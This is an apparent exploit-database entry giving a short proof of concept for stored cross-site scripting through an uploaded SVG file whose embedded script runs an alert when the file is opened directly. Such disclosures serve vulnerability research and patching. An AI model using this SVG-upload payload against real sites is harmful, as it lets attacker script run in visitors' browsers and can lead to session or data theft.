## https://sploitus.com/exploit?id=WPEX-ID:94954E1A-DC09-4811-B57D-B12BF69A767D
Upload an SVG with the following code:
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
Access the uploaded file directly to see the XSS.